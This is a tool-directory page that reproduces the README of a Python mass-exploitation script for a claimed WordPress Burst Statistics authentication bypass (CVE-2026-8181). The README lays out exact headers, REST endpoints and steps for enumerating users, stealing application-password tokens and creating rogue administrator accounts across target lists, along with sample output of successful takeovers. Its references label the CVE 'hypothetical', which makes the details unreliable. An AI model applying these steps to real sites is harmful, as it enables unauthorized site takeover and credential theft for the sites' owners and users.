Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-8181 — CVE-2026-8181: Burst Statistics Auth Bypass → REST API takeover & admin creation. Python 2.7. Educational use only. | Kitploit
Tools/GitHubGitHub/jenderal92/cve-2026-8181
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & Education
GitHubjenderal92/cve-2026-8181

CVE-2026-8181

CVE-2026-8181: Burst Statistics Auth Bypass → REST API takeover & admin creation. Python 2.7. Educational use only.

View Repository
74 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-8181 - Burst Statistics Authentication Bypass Exploit

Python 2.7 exploit for the Burst Statistics plugin vulnerability (CVE-2026-8181) that allows unauthenticated attackers to bypass REST API authentication, retrieve application passwords, and create new administrator users on vulnerable WordPress sites.

⚠️ Disclaimer
This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Use only on websites you own or have explicit permission to test. More Disclaimer You can see the disclaimer on the cover of Jenderal92. You can check it HERE !!!

CVE-2026-8181 affects the Burst Statistics plugin for WordPress (versions prior to the patch). The flaw resides in the REST API authentication mechanism, allowing an attacker to:

  • Bypass authentication by sending a crafted X-BURSTMAINWP header
  • Retrieve application passwords via the /burst/v1/mainwp-auth endpoint
  • Perform privileged actions (list users, read settings, create new admin accounts) through the WordPress REST API

Features

  • Multi-threaded scanning (default 10 threads)
  • Automatic detection of WordPress base paths (/, /wordpress, /wp)
  • Username enumeration via /wp-json/wp/v2/users or author ID redirects
  • Exploitation of the auth bypass to:
    • Obtain application passwords (Base64 encoded token)
    • Verify access to sensitive REST endpoints (settings, plugins, admin users)
    • Create a new administrator user with random credentials
  • Two output files:
    • res_login.txt – Concise, pipe‑separated REST API credentials (easy to parse/import)
    • full_res_login.txt – Complete human‑readable report including access verification and application passwords

Requirements

  • Python 2.7 (deprecated but required by the script)
  • requests library
pip install requests

Usage

  1. Prepare a target list file (one domain or IP per line, with or without http:///https://).

    Example targets.txt:

    example.com
    https://vulnerable-site.com
    127.0.0.1/wordpress
    
  2. Run the exploit:

python2 CVE-2026-8181.py targets.txt
  1. Results are saved to two files in the current directory:
    • res_login.txt – REST API credentials (one line per vulnerable target)
    • full_res_login.txt – Detailed report

Command Line Options

ArgumentDescription
list.txtPath to file containing target URLs

Example Output (Console)

============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']

[*] Scanning: example.com
    Trying path: /
    Detected username: admin
    [+] VULNERABLE! REST API bypass successful
    [+] Application Password obtained!
    [+]   Username: admin
    [+]   App Password: xxxx xxxx xxxx
    [+]   Base64 Token: YWRtaW46eHh4eA==
    [+] Access confirmed: WordPress settings
    [+] Access confirmed: Installed plugins
    [+] Access confirmed: Admin users
    [+] Admin user created via REST API: wp_abc123
    [+] Results saved to res_login.txt and full_res_login.txt

Output File Formats

1. res_login.txt – Concise REST API Credentials

Each line follows this pipe‑separated format:

target|username|password|email|user_id

Example:

http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42

This format is ideal for:

  • Importing into password managers or databases
  • Automating further actions (e.g., login scripts)
  • Quick inspection with cut, grep, or Excel

2. full_res_login.txt – Complete Detailed Report

For each vulnerable target, the script appends a human‑readable block:

============================================================
Target: http://example.com
============================================================

[+] Access Verification:
    [+] WordPress settings
    [+] Installed plugins
    [+] Admin users

[+] REST API Credentials:
    Username: wp_abc123
    Password: random12char
    Email: [email protected]
    User ID: 42
    URL: http://example.com/wp-admin/
    Note: Use with X-BURSTMAINWP header

[+] Application Password:
    Username: admin
    App Password: xxxx xxxx xxxx
    Base64 Token: YWRtaW46eHh4eA==

Note: If the application password endpoint is not available or returns no token, that section will show FAILED.

How It Works

  1. Target preparation – Adds http:// prefix if missing, strips trailing slashes.
  2. Path iteration – Tries /, /wordpress, and /wp as WordPress base directories.
  3. Username enumeration – Fetches /wp-json/wp/v2/users or uses ?author=N redirects.
  4. Bypass test – Sends X-BURSTMAINWP: 1 + Basic auth with username and dummy password (CVE-2026-8181). If endpoint /wp-json/wp/v2/users/me?context=edit returns 200, the site is vulnerable.
  5. Exploitation –
    • Requests /wp-json/burst/v1/mainwp-auth to retrieve an application password token.
    • Verifies access to /settings, /plugins, /users.
    • Creates a new administrator account via POST /wp-json/wp/v2/users.
  6. Result saving – Writes concise REST credentials to res_login.txt and full details to full_res_login.txt.

Customisation

You can modify these variables inside the script:

  • THREADS – Number of concurrent threads (default 10)
  • BASE_PATHS – Additional WordPress subdirectories to check
  • requests timeout values

License

This project is provided for educational purposes only. Use at your own risk.

References

  • CVE-2026-8181 Detail (hypothetical)
  • Burst Statistics plugin (affected versions)
Download Tool